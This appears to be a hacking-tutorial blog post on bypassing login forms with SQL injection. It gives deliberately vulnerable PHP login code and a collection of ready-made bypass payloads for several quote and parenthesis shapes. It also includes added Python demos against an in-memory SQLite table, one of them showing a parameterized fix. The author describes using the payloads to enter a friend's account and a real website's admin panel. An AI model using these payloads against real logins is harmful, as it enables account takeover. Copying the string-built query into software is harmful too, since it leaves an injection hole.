First of all, read the previous article, SQL Injection Explained From Scratch, so you can follow this one better.
So today we are going to learn how to bypass logins using SQL Injection.
Let's get straight to the point. This is a sample login form:

So innocent and simple: it matches the user input against the records in the database and lets the user into his account if a matching record exists; if there is no match, it shows an error like "The username or password is incorrect".
It seems secure, but as hackers say, "Security is an illusion", so to clear this illusion let's take a close look at the login form by checking its source code.

<?php
// Deliberately vulnerable: the two POST fields are pasted straight into the SQL text.
// (The mysql_* functions were removed in PHP 7; this is the legacy API the article uses.)
$username = $_POST['username'];
$password = $_POST['password'];
$query = "select username,password from users where username='$username' and password='$password' limit 0,1";
$result = mysql_query($query);
$rows = mysql_fetch_array($result);
if ($rows)
{
    echo "Login Successful";
    create_session();
}
else
{
    echo "Username or Password is incorrect";
}

So this is the source code of a webpage written in PHP. It takes the user input, puts it into the SQL query, runs the query, and if any row comes back it lets you log in.
Wait wait... it takes the user input and puts it into the SQL query?
What if there is no check on what the user enters and we can submit anything?
Yes, I am talking about submitting a piece of SQL and interacting with the database ourselves. This is what we call SQL Injection.
So let's try to log in without knowing a username and password. Yes, without username and password.
First of all, let's see which part of the code we need to deal with:

$query="select username,password from users where username='$username' and password='$password' limit 0,1";

Let's try to understand what this code does by breaking it into parts.
1. $query=
The PHP variable that holds the query text which is going to be sent to the database.

2. select username,password from users where
Selects the two columns username and password from the table named users, keeping only the rows that satisfy the condition that follows where.

3. username='$username' and password='$password'
The condition. PHP substitutes whatever the user typed for $username and $password, so the database is asked for a row whose username column equals the submitted username and whose password column equals the submitted password. The single quotes mark where each value starts and ends.
Confused?
Well, it takes the username and password from the user and then looks for a row in the users table that has exactly those two values.
Still confused?
I told you, man... I told you to read the previous article. Please take everything I say seriously.

Hmmm, so let's take advantage of the behavior of this code, i.e. it lets the user enter anything.
Look at the two single quotes around the value:
username='$username'
They mark the start and end of the value. Now let's have some fun by adding a ' (single quote) to the username field, as it will break the syntax (rules and shit, bro) of the query. Put some text before the quote, e.g. abc' : a lone quote just turns into username='' which is still valid SQL and shows nothing.
When we do this we get an error like "You have an error in your SQL syntax..." blah blah blah. (If the site hides database errors you only get the generic "incorrect" message, and you have to rely on the behaviour of the payloads below instead.)
With that error we just confirmed that our input is pasted into the SQL text without any escaping, so the database will run SQL that we type.

Now let's say I know that a friend of mine has an account on this website with the username Chutiya, but I don't know his password, and I know that this website is vulnerable to SQL Injection.
So I enter Chutiya in the username field and ' or ''=' in the password field.
And boom!! I got into his account!
Don't kill me, please... I will tell you everything.
Well, I entered ' or ''=' in the password field, which turned the condition into

and password='' or ''='' limit 0,1

The first quote closes the (empty) password value, and ''='' is always true, so the whole where clause becomes true; in other words, I told the database that the password check passed.

Strictly speaking, the query did not "match the username Chutiya and skip the password": because or is evaluated after and, username='Chutiya' and password='' or ''='' is true for every row, and limit 0,1 hands back the first row of the table. Whether that is Chutiya's account depends on the row order and on what create_session() does with the row. To land in one specific account reliably, comment out the password check instead, with the -- trick shown further down. *Like a boss*
Now, following the same method, one may gain admin access to a website by bypassing the admin panel.
The admin panel is the page where the admin of the website logs in and makes changes to the site.
In the admin panel we can try admin, superuser, etc. in the username field and again ' or ''=' in the password field.
But you can log in without knowing the username at all! Just inject ' or ''=' in both fields, username and password. Every row matches and the first row in the users table comes back, which on many sites is the account created first: the admin.

Let me show you a real scenario. I have the admin panel of a real website here:

Now let's put (inject) ' or ''=' in both the username and password fields:

*Hacker voice* I'm in:

So what happened here?
Well, both conditions became always-true, the query returned the first row of the users table, and the code treated that as a successful admin login.
Now let's try something else:

select username,password from users where username='' or true-- ' and password='' or ''='' limit 0,1;

Do you see that -- ? It starts a comment in SQL: everything after it up to the end of the line is ignored.
Comments do not get executed, so the database never sees the password condition (or the limit) at all; it just runs select username,password from users where username='' or true. One caveat for MySQL: -- only starts a comment when it is followed by a space, so type the payload as ' or true-- with a trailing space (URL-encode it as --+ or write -- - if the space gets trimmed), or use # which needs no space.
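Here is the whole bypass from the last few sections reproduced in Python against an in-memory SQLite table, as an added example that is not part of the original article. The accounts, the table layout and the helper names (make_db, vulnerable_login, safe_login) are assumptions made for the demo. vulnerable_login builds the query exactly the way the PHP code does; safe_login is the same query with bound parameters, added here to show the fix. Both return who the query actually logged you in as, which makes the row-order caveat visible: ' or ''=' next to a real username still hands back the first row of the table, while Chutiya'-- keeps the username check and drops the password check.

```python
import sqlite3

# Constructed demo accounts for this example, not data from any real site.
# Note the insertion order: admin is the first row in the table.
USERS = [("admin", "hunter2"), ("Chutiya", "s3cret")]


def make_db():
    """Build the users table the PHP snippet queries (assumed layout)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def vulnerable_login(conn, username, password):
    """Same logic as the PHP snippet: the two POST fields are pasted into the SQL text.

    Returns the username of the row the query matched, None if nothing matched,
    or "syntax error" if the input broke the query (what the ' probe produces).
    """
    query = ("select username,password from users where "
             f"username='{username}' and password='{password}' limit 0,1")
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.OperationalError:
        return "syntax error"
    return row[0] if row else None


def safe_login(conn, username, password):
    """The fix: a parameterized query. The driver sends the input as data, so a quote
    inside it is just a character of the value and can never end the string literal."""
    row = conn.execute(
        "select username,password from users where username=? and password=? limit 0,1",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    print(vulnerable_login(conn, "Chutiya'", "x"))            # the ' probe: syntax error
    print(vulnerable_login(conn, "Chutiya", "' or ''='"))      # admin, not Chutiya: ''='' matches every row
    print(vulnerable_login(conn, "' or ''='", "' or ''='"))    # admin: both fields injected
    print(vulnerable_login(conn, "Chutiya'-- ", "x"))          # Chutiya: the comment drops the password check
    print(vulnerable_login(conn, "admin'-- ", "x"))            # admin: same trick on the admin panel
    print(safe_login(conn, "Chutiya", "' or ''='"))            # None: the payload is just a wrong password
    print(safe_login(conn, "Chutiya", "s3cret"))               # Chutiya: the real credentials still work
```

Run it as a script to see the six results; the trailing space after -- in the payloads is there so the same strings also work against MySQL.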
So we talked about code that had the following query:

$query="select username,password from users where username='$username' and password='$password' limit 0,1";

Now let's see some variations of the query and how we can inject them. The rule is the same every time: your input has to close the quote (and any parentheses) the query put around the value, add an always-true condition, and then either comment out the rest or re-open the same quote and parentheses so the query's own tail closes them again.

Query (double quotes):

select username,pass from users where username="$username" and password="$passwrd" limit 0,1;

Injections (note the space after --):
" or true-- 
" or ""="
" or 1-- 
" or "x"="x

Query (single quotes inside parentheses):

select username,pass from users where username=('$username') and password=('$passwrd') limit 0,1;

Injections (note the space after --):
') or true-- 
') or ('')=('
') or 1-- 
') or ('x')=('x

Query (double quotes inside parentheses):

select username,pass from users where username=("$username") and password=("$passwrd") limit 0,1;

Injections (note the space after --):
") or true-- 
") or ("")=("
") or 1-- 
") or ("x")=("x

Query (double parentheses):

select username,pass from users where username=(('$username')) and password=(('$passwrd')) limit 0,1;

Injections (note the space after --):
')) or true-- 
')) or ((''))=(('
')) or 1-- 
')) or (('x'))=(('x

Life is too short to explain every injection above in detail, so just keep learning and you will find out how they work: each one is the same trick with a different closing sequence, and the wrong closing sequence gives you a syntax error instead of a login.
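To show the rule behind all of those variations, here is an added example (again not from the original article) that derives the payloads from the closing sequence the query uses and runs them against an in-memory SQLite copy of three of the query shapes above. The table contents and the function names (make_db, payloads, attempt, bypass_results) are assumed for the demo. The double-quote shapes are left out because SQLite reads "..." as an identifier where MySQL reads a string, and true is replaced by 1, which every database accepts. The results also show something the list above does not: the ''='' and 'x'='x shapes only work from the password field (in the username field they are ANDed with the still-wrong password), while the -- shape works from either field, and a payload built for the wrong shape just breaks the query.

```python
import sqlite3


def make_db():
    """Constructed demo table for this example; not data from any real site."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "hunter2"), ("bob", "letmein")])
    return conn


# Three of the article's query shapes as format templates. {u} and {p} are the
# spots where the PHP code pastes the raw POST fields. Keyed by the sequence an
# attacker must emit to close the value: the quote plus any wrapping parentheses.
TEMPLATES = {
    "'":   "select username,pass from users where username='{u}' and pass='{p}' limit 0,1",
    "')":  "select username,pass from users where username=('{u}') and pass=('{p}') limit 0,1",
    "'))": "select username,pass from users where username=(('{u}')) and pass=(('{p}')) limit 0,1",
}


def payloads(closer):
    """Derive the article's injection shapes from the closing sequence.

    Every payload first emits closer to finish the real value, then an always-true
    OR, and either comments out the rest or re-opens the same parentheses and quote
    so the query's original tail closes them again. The space after -- is kept on
    purpose: MySQL only treats -- as a comment when whitespace follows it.
    """
    quote, depth = closer[0], closer.count(")")
    open_, close = "(" * depth, ")" * depth
    return [
        f"{closer} or 1-- ",
        f"{closer} or {open_}{quote}{quote}{close}={open_}{quote}",
        f"{closer} or {open_}{quote}x{quote}{close}={open_}{quote}x",
    ]


def attempt(conn, template, username, password):
    """Run the vulnerable query with raw input. Returns the matched username,
    None for no match, or "syntax error" when the injection broke the query."""
    sql = template.format(u=username, p=password)
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError:
        return "syntax error"
    return row[0] if row else None


def bypass_results(conn, closer):
    """For each payload of this shape: (result in the username field, result in the password field)."""
    template = TEMPLATES[closer]
    return {
        p: (attempt(conn, template, p, "wrong"), attempt(conn, template, "nobody", p))
        for p in payloads(closer)
    }


if __name__ == "__main__":
    conn = make_db()
    for closer in TEMPLATES:
        for payload, (as_user, as_pass) in bypass_results(conn, closer).items():
            print(f"{closer:4} {payload!r:26} username field -> {as_user!s:12} password field -> {as_pass}")
    # A payload for the wrong shape leaves a parenthesis open: the query breaks instead of logging in.
    print(attempt(conn, TEMPLATES["')"], "' or 1-- ", "x"))
```

Reading the printed table, the -- payloads log in as admin from both fields because the comment removes the password condition entirely, while the quote-reopening payloads only succeed from the password field, where the true comparison ends up ORed with the whole username-and-password pair.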
